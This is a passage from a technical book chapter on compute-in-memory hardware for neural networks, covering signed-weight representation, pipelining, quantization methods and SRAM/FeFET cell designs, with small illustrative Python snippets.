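A small sketch of this two-step scheme follows: an 8-bit 2's-complement weight is sliced into four unsigned 2-bit cells plus one MSB cell (the 5 = 4 + 1 cells noted above), accumulated in unsigned form, and the negative base is folded back in at the end.

def slice_weight(x: int, bits: int = 8):
    """Split a 2's-complement weight into unsigned 2-bit cells plus an MSB cell."""
    u = x & ((1 << bits) - 1)           # raw bit pattern
    msb = (u >> (bits - 1)) & 1         # sign bit, base -2^(bits-1)
    body = u & ((1 << (bits - 1)) - 1)  # positive-base bits b0..b6
    cells = []
    for shift in range(0, bits - 1, 2):
        cells.append(((body >> shift) & 0b11, shift))  # (2-bit value, base)
    return msb, cells

def reconstruct(msb: int, cells, bits: int = 8) -> int:
    val = sum(c << s for c, s in cells)    # unsigned accumulation first...
    return val - msb * (1 << (bits - 1))   # ...then fold in the negative base

msb, cells = slice_weight(-77)
assert reconstruct(msb, cells) == -77
print(msb, cells)  # 1 [(3, 0), (0, 2), (3, 4), (0, 6)]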
Beyond the 2’s complement representation for signed weights, there are mainly
three methods used in the reported CIM designs: (1) implement the MAC indepen-
dently with positive and negative weights; (2) implement the MAC with positive
weights and use the reference column to move them back to zero-centered weight;
(3) use a differential pair of cells per weight to represent the signed weight value.
The first method uses two copies of the weight matrix: one with positive weights
only and the other with negative weights only. Then, both matrices are calculated
in an unsigned manner. No sign extension is needed. Then the result from the
negative arrays will be subtracted from its corresponding positive ones using pure
digital circuits. A simple illustration of this method is shown in Fig. 7a. The
disadvantage of this method is that it needs twice the hardware resources to represent
one weight matrix. Also, it is only suitable for inference implementation as the
training could make the weight change from positive to negative and vice versa.
The advantage of this method is that the two resulting matrices are sparser than the original one, which may reduce the design complexity of the periphery circuits.
The second method relies on the single reference column for an array, which
is one of the most common methods used for multi-level cells and could be
applied for both training and inference. The basic idea is shown in Eq. 7. For real
implementation, the weights in the kernel are limited to a finite range. Assume
weight wi ∈ [−b, b], thus the shifted weight wi + b ∈ [0, 2b], which is always
positive. This all-positive weight matrix will be mapped to the memory array, and
then the MAC could be done with unsigned weights. A reference column will be
attached to the array to calculate the second term Σ_i in_i · b, as shown in Fig. 7b.
Since b is a constant decided by the weight range, the reference column could be
shared by the whole array. Finally, the shift back could be done in the analog domain
before ADC or by the digital circuits after ADC. The former is more difficult to
implement by circuits as the subtraction in the analog domain is not as easy as the
addition. On the other hand, the latter will introduce more errors since both terms
have quantization errors introduced by the ADC.
Fig. 7 Weight number representation: (a) positive weight matrix + negative weight matrix; (b) shifted weight matrix + reference column; (c) weight matrix with two differential cells representing one weight
partial sum = Σ_i in_i · w_i
            = Σ_i in_i · [(w_i + b) − b]    (7)
            = Σ_i in_i · (w_i + b) − Σ_i in_i · b
The last method is based on a differential pair of two cells, which could be described by Eq. 8 and Fig. 7c. Similar to the second method, the subtraction could be done before summation in an analog manner (Liu et al. 2020) or after summation using digital circuits, depending on the implementation. This method doubles the cells needed to represent one weight. While the first method also needs double the cell number, this method does not guarantee a similar sparsity reduction as the first one.
Compared to the second method, which has a common shared reference, this method
introduces more overhead. However, this method employs two adjacent cells in a
differential manner, and it has more flexibility to cancel the local process variations
and fine-tune the weight more precisely.
partial sum = Σ_i in_i · w_i
            = Σ_i in_i · (w_i^+ − w_i^−)    (8)
            = Σ_i in_i · w_i^+ − Σ_i in_i · w_i^−
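The following sketch checks on random illustrative data that the three representations recover the same signed MAC result; it models only the arithmetic, not the analog circuit behavior.

import numpy as np

rng = np.random.default_rng(2)
inp = rng.integers(0, 2, size=32).astype(float)      # unsigned inputs
w = rng.uniform(-1.0, 1.0, size=32)                  # signed weights
ref = inp @ w                                        # ground truth

# (1) Two matrices: positive-only and negative-only weights, digital subtract.
pos, neg = np.maximum(w, 0), np.maximum(-w, 0)
m1 = inp @ pos - inp @ neg

# (2) Shifted weights in [0, 2b] plus a shared reference column of b's (Eq. 7).
b = 1.0
m2 = inp @ (w + b) - inp @ np.full_like(w, b)

# (3) Differential pair per weight: w = w+ - w- (Eq. 8).
w_plus, w_minus = (np.abs(w) + w) / 2, (np.abs(w) - w) / 2
m3 = inp @ w_plus - inp @ w_minus

assert np.allclose([m1, m2, m3], ref)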
Pipeline Design in CIM Architecture

After mapping the network to the hardware, dataflow techniques are usually used to help improve DNN acceleration in CIM architectures. The pipeline is a representative example of such techniques.
Intra-Layer Pipeline
As one of the representative CIM architectures, ISAAC (Shafiee et al. 2016)
attempts to improve the throughput of the architecture by using an intra-layer
pipeline, which first computes a small portion of one layer and then assigns the partial outputs as the inputs for the succeeding layer in the next cycle. Figure 8
shows an example of a buffer requirement for such a pipeline, assuming that a 6 × 6
input feature map is being convolved with a 2 × 2 kernel. As shown in Fig. 8a, the
generated outputs 0, 1, 2, . . . , 6, 7 (in green) from the previous layer <n – 1> are
placed in the input buffer for layer <n>. At this moment, enough information has
been acquired to start the operations for layer <n>. So the first output for layer
<n> could be produced by stored inputs 0, 1, 6, 7 (in red box). Then, after layer
<n − 1> produces output 8, layer <n> can start to calculate the next output with input
1, 2, 7, 8 (Fig. 8b). In such a way, every new output produced by layer <n−1> triggers
the pipelining of layer <n>, which could perform kernel-based operations step-by-
step. Figure 8c shows the status of the input buffer after a few steps. At the same
time, serviced inputs (in gray) can be released from the input buffer. ISAAC’s intra-
layer pipeline enables a saving in the buffering requirements between successive
layers and a throughput improvement. However, the pooling function in DNNs could
rapidly shrink the layer size, limiting the intra-layer pipeline efficiency. Another
drawback is the increased instantaneous power, as all the layers are expected to be active simultaneously, which may exceed the power budget of edge devices.
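For the example of Fig. 8, the point at which layer <n> can fire follows from simple arithmetic; the sketch below assumes the 6 × 6 IFM and 2 × 2 kernel used above.

W_IFM, K = 6, 2    # 6x6 input feature map, 2x2 kernel, as in Fig. 8

# Layer <n> needs the top-left K x K window of its input: (K - 1) full
# rows of the IFM plus K more entries must have arrived.
needed = (K - 1) * W_IFM + K
print(f"layer <n> can start after receiving inputs 0..{needed - 1}")  # 0..7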
Inter-Layer Pipeline
Since CNN computations follow a layer-by-layer process, a possible inter-layer
pipeline could significantly speed up the whole process. Specifically for training,
both the FF and EC processes are executed in a layer-by-layer fashion. CIMAT
(Jiang et al. 2020a) proposes an inter-layer pipeline design, which allows the new
input to enter the pipeline every cycle within a batch. A pipeline dataflow for training
ResNet-18 is shown as an example in Fig. 9a. Since layer size varies a lot in one
network, sometimes one pipeline stage needs to include several layers to match
the latency of each stage.

Fig. 8 Input buffer state for the intra-layer pipeline example at three successive steps (a–c), showing entries not yet received, in the buffer, and serviced & released

Fig. 9 (a) An inter-layer pipeline example inside FF and EC for ResNet-18. (b) Training process in timeline of 7 T SRAM-based CIM architecture

In this example for ResNet-18, the latency of layers 1, 2,
3, 4, 5 to process an entire image is almost the same, approximately equal to the
total latency of the sixth to 17th convolution layers. Therefore, Layers 1, 2, . . .
5 are treated as pipeline stage 1 to stage 5, respectively, while layer 6 to layer 17
are grouped as one stage (stage 6). Stage 7 consists of a fully connected layer and
other activation function blocks. Starting from FF computation, in cycle T1_1, the
first input (i.e., first image) enters stage 1, which performs the FF computation.
At the end of T1, the outputs need to be sent to the buffer or off-chip memory
for future EC computation. Then at T1_2, the second image enters stage 1 while
the first image is passed to stage 2. In such a way, except for some initial cycles,
all the stages are occupied simultaneously in the pipeline. As described in Fig. 9,
a data dependency exists between the FF and EC computations: the EC process can only start after the last layer's error outputs are obtained, i.e., after the FF process is completed.
The pipeline dataflow of the EC and FF processes is highly alike but in opposite
directions. Figure 9b shows the entire training process in the timeline. First, one
batch of images is fed into the CIM architecture stage by stage in the forward
direction for the FF process. After finishing the FF process of one batch (T1), the
EC process starts to operate stage by stage in the backward direction (T2). The
generated intermediate data in FF and EC process needs to be saved in buffer or
off-chip memory for gradient calculation. For the gradient calculation (GC) process,
after the errors are obtained for one batch, they are used together with the activations
to calculate the weight gradients (T3). The GC is performed after the batch FF and
EC process. Finally, weight gradients are averaged across the batch to update the
weights (T4). Pipelayer (Song et al. 2017) shows a similar inter-layer pipeline design
employing another set of weight matrices to activate the inter-layer pipeline between the
FF and EC processes. The reason is that, with two copies of the weight matrix,
FF and EC processes can be executed simultaneously on different CIM arrays.
The drawback will be the doubled hardware cost. There is an improved CIMAT
architecture based on a novel 8 T transposable SRAM design (Jiang et al. 2020a),
which can perform FF and EC on the same array concurrently without employing
additional CIM arrays. The proposed 8 T SRAM bit-cell can perform bidirectional
read simultaneously (described in the section “Device Technologies”), which means
the CIM sub-array equipped with such 8 T SRAM is able to support bidirectional
MAC calculation synchronously. Thus, an aggressive inter-layer pipeline design is
proposed based on this ability, as shown in Fig. 10a. The stage configuration of the
FF and EC process is the same as the pipeline design in Fig. 9. However, instead of
waiting for the completion of the FF process, the EC process could form pipelines
together with the FF process to increase throughput significantly. In addition, as long
as the activation and error outputs of the first image are ready, the weight gradient
calculation could start to work. If the latency of the GC stage approximately equals the latency of the FF/EC stage, gradient calculation could also work in a pipelined fashion together with the FF and EC processes. The latency of the GC stage is largely determined by the available hardware resources, since GC can be processed in parallel; it can therefore be tuned to match the stage latency of FF/EC. The state of each stage as a function
of time is shown in Fig. 10b. For example, at T14, FF/EC stage 7 (FF/EC S7) is
performing the FF of image 8 and the EC of image 7 simultaneously. Meanwhile,
GC stage 1 (GC S1) is able to calculate the weight gradient for image 6 because the necessary activations and errors of image 6 were obtained in cycles T12 and T13, respectively. Such a fully inter-layer pipelined design could further
improve the throughput of the training process with a small hardware overhead.
Fig. 10 (a) Dataflow of an improved inter-layer pipeline using an 8 T SRAM-based CIM architecture. (b) The state of each stage as a function of time
Besides, the optimized pipeline is also beneficial to energy saving due to the reduced
off-chip memory access and reduced standby leakage of circuits. The overhead of such a highly pipelined architecture is the large on-chip buffer capacity required to execute the pipeline.
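The flavor of the schedule in Fig. 10b can be reproduced with a toy generator; the stage count and the cycle offsets of the backward EC wave are modeling assumptions, and only the cited T14 behavior of stage 7 is taken from the text above.

N_STAGES, N_IMAGES = 7, 9     # pipeline depth and batch slice (illustrative)

def schedule(t: int):
    """Image served by each FF/EC stage at cycle t (None = idle)."""
    busy = {}
    for s in range(1, N_STAGES + 1):
        ff = t - s + 1                          # FF wave flows forward
        ec = t - N_STAGES - (N_STAGES - s)      # EC wave flows backward
        busy[s] = (ff if 1 <= ff <= N_IMAGES else None,
                   ec if 1 <= ec <= N_IMAGES else None)
    return busy

# At T14, stage 7 serves the FF of image 8 and the EC of image 7 at once,
# matching the behavior described for Fig. 10b.
print(schedule(14)[7])   # (8, 7)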
Quantization Techniques in CIM Architectures

In general-purpose platforms such as GPUs, the training and inference of DNNs are usually run with 32-bit or 64-bit floating-point number representations. On the one hand, the higher the numerical precision, the more energy is consumed per operation. On the other hand, floating-point calculation usually requires more hardware resources and consumes more power than fixed-point calculation. Therefore, for DNN accelerators, especially for edge devices, quantized training and inference are usually utilized to minimize the chip area and power consumption.
The quantized DNN algorithm is also an important and active research topic for
CIM architecture. Although CIM has the potential to conduct pure analog calcula-
tion, which means both input and weight could be high precision theoretically, the
fact is that the dynamic range of the outputs from the circuits/devices is limited. In
general, inputs are limited to 1–2 bits per cycle, while cells are limited to 1–5 bits per cell, depending on the device technology.
to the array cycle by cycle, while high precision weights could be represented by
several cells per weight. In this case, shift-adders are essential to accumulate the
corresponding partial sums to get the final high-precision MAC outputs. Obviously,
the lower the input/weight precision, the lower the hardware cost to implement the
model with the CIM architecture. In addition, it is difficult to implement floating-point operations in CIM: since the weights are stored stationary in memory, radix-point alignment is hard to realize. Consequently, most of the proposed CIM
architectures are designed for fixed-point operation inside the arrays. This chapter
focuses on fixed-point calculation in CIM. Recently, some CIM designs supporting
floating-point calculation were proposed (Imani et al. 2019), and the readers could
check the reference for the floating-point case if interested.
The quantization of DNN has been studied ever since the 1990s (Presley and
Haggard 1994). According to the targeted operation modes, it could be divided into
two categories: low precision inference and low precision training. The quantization
for inference aims to obtain a model that mainly includes low-precision weights
and activations in the inference stage. Without specific techniques applied, directly
quantizing the weights and activations of a well-trained floating-point model to 8-
bit fixed-point inference is usually possible to have negligible performance loss for
most image classification tasks (Vanhoucke et al. 2011). Low precision training
targets reducing energy costs and required resources for training/quantization.
It is much more challenging to guarantee comparable performance with the floating-
point network with low-precision training. As the weights need to be updated
during training, which may cause large dynamic range changes for both weights
and activations, using a low precision fixed-point number representation across all
19 Compute-in-Memory Architecture 665
the training processes is risky. The safer choice is to use at least 16-bit floating-point
numbers for low-precision training, especially for those complex datasets requiring
training from scratch.
Several popular quantization techniques that are widely used in CIM architec-
tures will be briefly introduced, which are: (a) dynamic fixed-point quantization;
(b) mix-precision weight; (c) stochastic quantization. More aggressive quantization
algorithms that are not applicable to CIM are not covered in detail in this chapter.
Dynamic fixed-point quantization (Courbariaux et al. 2015) was proposed as a compromise between fixed point and floating point for training; tested on the MNIST and CIFAR-10 datasets, it successfully reduced the precision to 10 bits for FF and EC. Dynamic fixed point attaches a scaling parameter to a group of fixed-point numbers that plays the role of the exponent part of a floating-point number, called the shared exponent. This shared exponent changes during training while keeping the MAC operation in low fixed-point precision. For example, the shared exponents could
be the moving average of the maximum value of the numbers participating in MAC.
A DNN model could have several shared exponents for groups of numbers, such as
one per layer or one per channel. The original paper only explores its effectiveness
on moderate tasks such as CIFAR-10 classification, but this concept is widely used
in the following proposed quantization algorithms.
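A minimal sketch of shared-exponent (dynamic fixed-point) quantization with one exponent per tensor is shown below; the bit width and data are illustrative.

import numpy as np

def dynamic_fixed_point(x: np.ndarray, bits: int = 10):
    """Quantize a tensor to fixed point with one shared exponent."""
    # Shared exponent: smallest power of two covering the max magnitude.
    exp = int(np.ceil(np.log2(np.max(np.abs(x)) + 1e-12)))
    scale = 2.0 ** (exp - (bits - 1))          # LSB size for `bits`-bit values
    q = np.clip(np.round(x / scale), -(2**(bits - 1)), 2**(bits - 1) - 1)
    return q * scale, exp                      # dequantized tensor + exponent

acts = np.random.default_rng(3).standard_normal(1000) * 0.3
q, exp = dynamic_fixed_point(acts, bits=10)
print(f"shared exponent = {exp}, max error = {np.max(np.abs(q - acts)):.5f}")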
The mix-precision weight is another technique used in Courbariaux et al. (2015)
and many other quantization algorithms based on the observation that weights used
in FF and EC could be in lower precision than in WU (for gradient accumulation).
Thus during training, a copy of high-precision weights will be stored in memory.
For the FF and EC, this copy will be quantized to lower precision for economic
convolution calculation. After the weight gradients are calculated, they are used to
update the high precision weights version instead of the quantized version for FF
and EC calculation.
Stochastic quantization is introduced in Hubara et al. (2016) for gradient
quantization to avoid the underflow of small gradients. In stochastic quantization,
the distance of a gradient to its neighboring quantized levels determines the probability of rounding to each of them.
Compared to deterministic quantization, nonzero probabilities are assigned even
to very small gradients. Stochastic quantization could make the gradients effective
even with lower precision, which means the weight used in the weight update could
be held in lower precision.
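A minimal sketch of stochastic rounding follows, showing why tiny gradients survive on average; the LSB size and gradient values are illustrative.

import numpy as np

rng = np.random.default_rng(4)

def stochastic_round(x: np.ndarray, lsb: float) -> np.ndarray:
    """Round to multiples of `lsb`, rounding up with probability equal to the remainder."""
    scaled = x / lsb
    floor = np.floor(scaled)
    prob_up = scaled - floor                   # distance above the lower level
    return (floor + (rng.random(x.shape) < prob_up)) * lsb

# A tiny gradient far below the LSB: deterministic rounding always kills it,
# while stochastic rounding keeps it alive on average (unbiased in expectation).
g = np.full(100_000, 0.001)
print(stochastic_round(g, lsb=0.01).mean())    # ~0.001, not 0.0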
Quantization techniques (a) and (b) are widely used to train a quantized model for
inference-only mode. For the dynamic fixed-point value, the shared exponents are
fixed during the inference stage once the training is done. Thus the model could be
mapped to the hardware using the fixed-point format. Since the training overhead is
not considered, the high precision copy of the weight could be implemented even in
floating-point, which means the gradient could be floating-point. Also, since EC is
not a part of inference, errors could be implemented in high precision floating-point
to reduce the noise caused by quantization during training. Compared to quantizing
the floating-point model directly after training, these quantization-aware training
techniques could achieve lower precision inference for similar accuracy on the same
model structure.
666 H. Jiang et al.
During the training, all three techniques are important to keep the overall on-chip
hardware overhead small. Activation, weight, and error are all in dynamic fixed-
point format to support low precision fixed-point MAC for both FF and EC. Weight
precision is low due to the mixed precision, which will benefit FF and EC since it
takes part in both. Stochastic quantization is important to keep the gradient at low
precision, thus decreasing the required weight precision during weight update.
Some modern quantization algorithms achieve extreme quantization with one or more of these three techniques, thereby becoming attractive for CIM implementation. The DoReFa network (Zhou et al. 2016), which utilizes all three aforementioned techniques, reports satisfactory accuracy on ImageNet classification with only 1-bit weights, 2-bit activations, and a 6-bit gradient. The error obtained in EC remains floating point, making this method suitable only for inference. At the same time, DoReFa introduces a tanh function into the quantization, adding hardware overhead. The extreme case of quantization is to use binary activations and weights for the convolution computations, as in BNN (Hubara et al. 2016) and XNOR-Net (Rastegari et al. 2016). BNN directly quantizes each weight to its sign, while XNOR-Net additionally introduces a scaling factor per output channel on the weights' signs. Both use floating-point gradients and errors for EC/GC/WU, making them a better choice for inference than for training. CIM inference chips based on XNOR operations are reported in Yin et al. (2020a) and Liu et al. (2018).
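The two binarization rules can be written compactly as follows; the OIHW weight layout assumed for the per-output-channel scaling factor is an illustrative choice.

```python
import numpy as np

def binarize_bnn(w):
    # BNN: each weight becomes its sign (+1 / -1).
    return np.where(w >= 0, 1.0, -1.0)

def binarize_xnor(w):
    # XNOR-Net: sign plus a per-output-channel scaling factor alpha,
    # taken as the mean absolute weight of that channel (OIHW layout assumed).
    alpha = np.abs(w).mean(axis=(1, 2, 3), keepdims=True)
    return alpha * np.where(w >= 0, 1.0, -1.0)

w = np.random.default_rng(0).normal(size=(8, 3, 3, 3))   # 8 output channels
print(binarize_xnor(w).reshape(8, -1)[:, 0])             # one scaled sign per channel
```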
A promising algorithm for training, called WAGE, is proposed in Wu et al. (2018); its name comes from the fact that quantization is applied to weights, activations, gradients, and errors. An advantage of WAGE is that it uses fixed-point quantization within the range (−1, 1) for weights and activations, with a precisely pre-calculated scaling factor, which is friendly to hardware implementation. The error is scaled by its maximum value, which introduces some overhead, but there is no need to scale back, making it a relaxed version of dynamic fixed-point. With mixed-precision weights and stochastic quantization, WAGE can reduce the precision of weights, activations, gradients, and errors to 2, 8, 8, and 8 bits with no accuracy loss on moderate tasks such as CIFAR-10 classification. Thus, in this algorithm, the weights used in the FF and EC processes are 2-bit, while an 8-bit high-precision version is needed for the weight update according to the 8-bit weight gradients. In an actual hardware implementation, the work in Sun et al. (2018) exploits the "volatile" gate voltage of a ferroelectric field-effect transistor (FeFET) to realize this hybrid-precision scheme. The problem with WAGE is that it suffers from performance loss when scaled to more complicated tasks such as ImageNet classification. An improved WAGE version has been proposed that replaces the original fixed-point quantization with dynamic fixed-point, achieving improved accuracy at the cost of higher hardware implementation complexity. WAGE is an attractive method for training as it considers quantization for all four quantities, and some CIM accelerators for training have been proposed based on this algorithm (Jiang et al. 2020b).
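The following sketch captures WAGE's two hardware-friendly ingredients, the fixed-point grid on (−1, 1) and the power-of-two error scaling without scale-back; the helper names and the use of ceil for the scaling exponent are illustrative choices, not the paper's exact code.

```python
import numpy as np

def q(x, bits):
    # Uniform quantization onto the grid {k * sigma}, sigma = 2^(1-bits),
    # clipped inside (-1, 1), following WAGE's fixed-point format.
    sigma = 2.0 ** (1 - bits)
    return np.clip(np.round(x / sigma) * sigma, -1 + sigma, 1 - sigma)

def quantize_error(e, bits=8):
    # Scale the error by a power of two at least as large as its maximum
    # magnitude, then quantize; WAGE never scales back, which is the
    # "relaxed" dynamic fixed-point mentioned in the text.
    s = 2.0 ** np.ceil(np.log2(np.max(np.abs(e)) + 1e-12))
    return q(e / s, bits)

print(q(np.array([0.3, -0.7]), bits=2))          # 2-bit weights for FF/EC
print(quantize_error(np.array([0.02, -0.005])))  # 8-bit scaled error
```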
While these quantization methods could in principle be applied to CIM architectures, they are mainly developed for digital systems, where all calculations are exact at the chosen precision, however low it may be. The MAC of CIM, by contrast, is implemented in the analog domain and needs ADCs to convert the analog partial sums to digital values. Considering the dynamic range and circuit complexity, it is impractical in most parallel-reading cases to use an ADC whose precision matches the full output precision. Furthermore, since array partitioning is necessary for a large weight matrix, the quantization errors (from sub-arrays) introduced by the ADCs are further accumulated, which is usually not considered in the quantization algorithms mentioned above. Thus, when mapping a training/inference algorithm to a CIM system, one needs to consider the effect of ADC quantization on accuracy. This is discussed in detail in a later section introducing the ADC circuits.
Device Technologies
SRAM
SRAM is widely used as the on-chip buffer in microprocessors and has enjoyed the benefits of scaling together with logic transistors. With aggressive scaling, large on-chip SRAM capacity has been demonstrated (e.g., 256 Mb of SRAM at 5 nm (Yeap et al. 2019)), making it possible to hold most of the weights on-chip. Besides, because SRAM is much cheaper to write than eNVMs, it is suitable for training tasks that need to update the weights frequently.
In principle, the conventional 6T SRAM cell (shown in Fig. 11a) can be used directly for CIM computation. For the MAC operation, BL and BLB are first pre-charged. Then the input is applied to transistors T1 and T2 through the WL, with the weight bit represented by the value at node Q. When the input is "1", the cell will attempt to charge BL if Q is "1" and discharge BL if Q is "0".
Fig. 11 SRAM cells used in CIM: (a) conventional 6T SRAM; (b) read-decoupled 8T SRAM; (c) transposable 7T SRAM
When the input is "0" for a row, T1 and T2 are off, and Q/QB contributes no current to BL or BLB. When multiple rows are turned on, BL decays from the supply voltage VDD at different rates, and its voltage at the moment the sense amplifier (SA) is enabled represents the analog MAC result. This structure has two limitations. One is a reliability issue called read-disturb that arises when multiple rows are activated simultaneously. For a regular 6T SRAM read, only one cell is activated (thus only one discharge path is connected to BL or BLB), causing either BL or BLB to decay. The WL is closed as soon as the voltage difference is large enough for the SA output to flip, so neither BL nor BLB drops to a very low voltage. In CIM mode, however, several cells contribute discharge paths on both BL and BLB, making the discharge rates much faster. When either BL or BLB goes too low, it will flip the nodes storing "1" that are connected to it. Since the voltage of BL represents the analog MAC result, a high dynamic range is preferred, and read-disturb limits the design range of 6T SRAM-based CIM. Another issue with the 6T cell is the asymmetric data pattern for partial-sum accumulation. The product of input "1" (applied to the pass-gate) and weight "0" (stored in the cell) has a different impact on the discharge current than the product of input "0" (applied to the pass-gate) and weight "1" (stored in the cell), so the analog output representing "0" varies with the input and weight data patterns. To eliminate the resulting reference mismatch in ADC quantization, input-aware dynamic reference generation is employed (Huang et al. 2020a).
To be compatible with in-memory computation, innovation in bit-cell design is desired. A more practical choice for SRAM-based CIM is therefore the 8T read-decoupled bit cell, shown in Fig. 11b, at the noticeable expense of additional layout area. The 8T cell was originally designed to split the write and read ports and thereby eliminate the write/read margin trade-off of the 6T SRAM. The two extra transistors (T3 and T4) in series on the read port form a natural structure to support the multiplication of the weight bit at node Q and the input applied through the RWL. Only when both the input and the weight bit are "1" is there a discharge path connected to the RBL. In this case, the data pattern for weight and input is symmetric since both are represented by gate voltages. Also, since the read is decoupled, it does not disturb the data stored in the cell and has a larger dynamic range.
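Functionally, the 8T read path computes the logical AND of the input bit and the stored weight bit, and the bitline sums these products as current. A behavioral sketch (the per-cell current value is an assumption, not from a specific design):

```python
import numpy as np

rng = np.random.default_rng(1)
inputs = rng.integers(0, 2, size=128)       # bits applied on the RWLs
weights = rng.integers(0, 2, size=128)      # bits stored at node Q

# A discharge path exists only when BOTH input and weight are '1',
# so each cell contributes AND(input, weight) to the RBL current.
i_cell = 5e-6                               # assumed nominal per-cell current (A)
i_rbl = i_cell * np.sum(inputs & weights)   # analog MAC result on the read bitline
print(i_rbl)
```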
Both the original 6T and 8T cells are inefficient for training, since the input and output directions are not transposable. They can be modified to make transposable reads possible with extra transistors and BLs/WLs. Some memory designs rotate the direction of the RWL and RBL in the 8T read-decoupled cell, so that the column read is supported through the additional read port while the row read is still done through the original 6T portion, which then suffers from the read-disturb and asymmetric data pattern problems. A low-overhead 7T transposable SRAM cell with decoupled reads in both directions is used for CIM computation in the work of Jiang et al. (2020a), as shown in Fig. 11c. For the FF process, the input is applied on C_RWL while the weight is applied on the gate of T3. When input and weight are both "1", a charge current is contributed to R_RWL. On the other hand, when the input is "0", the input line is floated instead of connected to ground to avoid the asymmetric data pattern. C_RWL and C_RBL exchange their roles for the EC process: C_RWL acts as R_RBL, and C_RBL acts as R_RWL. R_RWL is enabled as the neuron input and R_RBL is used as the bitline for partial-sum read-out. The column and row paths can have separate sets of ADCs for easy routing or one shared set of ADCs for area reduction. The drawback of such a 7T design is that sneak paths may exist if the unselected rows/columns are left floating. Other bit-cell variants have been proposed to fulfill specific operational requirements. For example, to map XNOR-Net to the CIM cell, both input and weight are binarized to +1/−1. Although this two-state value can be represented by a single bit, the multiplication between two such bits is XNOR instead of AND. A split-6T cell design was proposed (Khwa et al. 2018) to support the XNOR operation in SRAM cells. Similar work uses this structure to integrate XOR ciphers into an SRAM CIM architecture (Huang et al. 2020a). A variant of the design is the 8T-XNOR bit cell (Liu et al. 2018), where two additional pass-gate transistors cross-couple BL and BLB to implement XNOR. Another design implementing XNOR-Net uses a custom 12T bit cell with significant overhead (Yin et al. 2020a).
Fig. 12 Structure of eNVM-based arrays: (a) 1T1R cells based on the typical foundry embedded
memory design rule; (b) 1T1R based on a pseudo-crossbar array; (c) 1T1FeFET cells based on a
pseudo-crossbar array
Three-Terminal eNVM
Three-terminal NVM devices generally employ the transistor channel conductance to represent the weight, which can be modulated through a tunable threshold voltage. A representative three-terminal NVM is Flash memory, based on floating-gate or charge-trap cells. Owing to its extremely high write voltage (>20 V) and long write latency (>10 μs), Flash memory is applicable only to inference designs. On the other hand, the emerging ferroelectric field-effect transistor (FeFET) is a more promising solution. By modulating the polarization direction of the ferroelectric layer in the gate stack, the threshold voltage can be changed, introducing different channel conductances in the transistor. FeFET shows some highly desired features, such as a very high on/off ratio (>1000), a relatively short programming pulse width (<50 ns), and a smooth weight-update curve. Most importantly, scaled FeFET, with its field-driven mechanism, consumes much lower programming energy (∼fJ/bit) than current-driven RRAM or PCM (∼pJ/bit).
The basic FeFET cell structure for CIM is shown in Fig. 12c. During the CIM read operation, the input is applied to the SL while the current is summed along the BL. This is similar to the configuration of the transposable CIM operation and can thus be used directly for training. Unlike the 1T1R cell, which has a transistor in series with the resistor representing the weight, the FeFET cell has an extra transistor connected to the FeFET gate. This additional transistor serves as the selection control to skip unselected rows when the input is zero: a weight of "1" in a FeFET corresponds to a negative threshold voltage, so a floating gate voltage provided by the extra transistor is necessary to turn off the channel.
One critical problem for training with eNVM devices is the asymmetric and nonlinear weight update. For most eNVMs, the trajectories of potentiation and depression are nonlinear and asymmetrical (Chen et al. 2018b). As reported by Sun and Yu (2019), a nonlinear but symmetrical update of the weight conductance does not cause a large accuracy loss in training, whereas nonlinearity combined with asymmetry degrades the training performance substantially. An adaptive-momentum method (Huang et al. 2020b) can be used to compensate for the non-ideal conductance tuning. Device-to-device (D2D) variation, caused by varying device nonlinearity, can also be compensated with a similar scheme. Circuit techniques such as adding auxiliary transistors to the bit cell (e.g., 2T-1FeFET (Sun et al. 2018)) can also make the update more linear. Cycle-to-cycle (C2C) variation is more problematic, so further device engineering to suppress the variation is desired. Besides, high device endurance is preferred to support on-chip training. It should be emphasized that the endurance requirement is also task-dependent, i.e., it depends on the number of weight-update iterations needed for convergence.
According to the basic structure of a CIM sub-array (shown in Fig. 1c), by applying voltages Vi simultaneously to the crossbar rows, multiplication is performed via Ohm's law between each device conductance and Vi to produce a current Ii. The currents Ii from multiple rows are then summed along the column, representing the dot product. A possible bidirectional array design for training computes in the same manner; the only difference is that the summing directions are perpendicular. CIM arrays typically have three design components: (1) the memory array, (2) input encoding, and (3) output sensing. Circuit techniques for these components are introduced in turn below.
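The crossbar dot product can be captured in a few lines; the conductance and voltage ranges below are arbitrary illustrative numbers.

```python
import numpy as np

rng = np.random.default_rng(0)
G = rng.uniform(1e-6, 1e-4, size=(64, 32))   # device conductances (S): 64 rows x 32 cols
V = rng.uniform(0.0, 0.2, size=64)           # read voltages V_i applied on the rows

# Ohm's law per cell (I = G * V) plus current summation along each column
# gives the dot product: I_j = sum_i V_i * G_ij.
I_col = V @ G                                # forward (FF) direction

# A transposable array performs the same operation in the perpendicular
# direction for error computation (EC) during training.
E = rng.uniform(0.0, 0.2, size=32)
I_row = G @ E
print(I_col.shape, I_row.shape)              # (32,), (64,)
```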
Memory Modification
In older technology nodes (e.g., 65 nm), there is room to modify the bit cell and reroute interconnections. In advanced technology nodes (e.g., 28 nm and beyond), however, foundries typically do not allow such changes to the memory design. Although it is possible to implement SRAM using the logic design rules, the result will not be as dense as the foundry's compact memory array. Therefore, a viable approach is to group the 6T SRAM rows into memory banks and embed a row of compute cells between banks to enable more sophisticated functions, as shown in Fig. 13a. In this configuration, the 6T SRAM is used as a memory cell only, and the real computation is done in the compute cells. A group of compact 6T SRAM cells is connected through the local bitline/local bitline-bar (LBL/LBLB) of each bank, and the data from the 6T SRAM cells are sent to the compute cells through LBL/LBLB. Compute cells of different banks can thus work in parallel during compute mode without sacrificing throughput. All the banks are connected through the global bitline/global bitline-bar (GBL/GBLB), through which the normal cell reads and writes for the memory array are performed.
Fig. 13 Memory modification embedding computing cells into foundry-rule-defined 6T SRAM arrays: (a) memory banks with computing cells inserted; (b) compute cells supporting 4-bit input; (c) compute cells supporting transpose read
Figure 13b, c shows two typical local-computing cell designs (Si et al. 2020; Su et al. 2020). The design in Fig. 13c is taken as an example to explain the functionality. In each input cycle, a 2-bit input is applied to the gates of N1 and N4, corresponding to the MSB and LSB, respectively. The N1-N3 pair and the N4-N6 pair perform the MSB and LSB multiplications of the input, respectively. The transistor width of N1-N3 is designed to be twice that of N4-N6, which lets the N1-N3 pair produce a discharge current twice that of the N4-N6 branch. When the currents of the N1-N3 and N4-N6 pairs are summed, the voltage swing contributed by the computing cell is proportional to the product of the 2-bit input and the 1-bit weight. For the backward calculation, the computation is performed in the perpendicular direction. The advantage of such memory modification is that multi-bit MAC operations per cycle or additional functionality (e.g., bidirectional read) can be implemented thanks to the flexibility of the computing-cell design, while still using foundry-provided compact-rule cells.
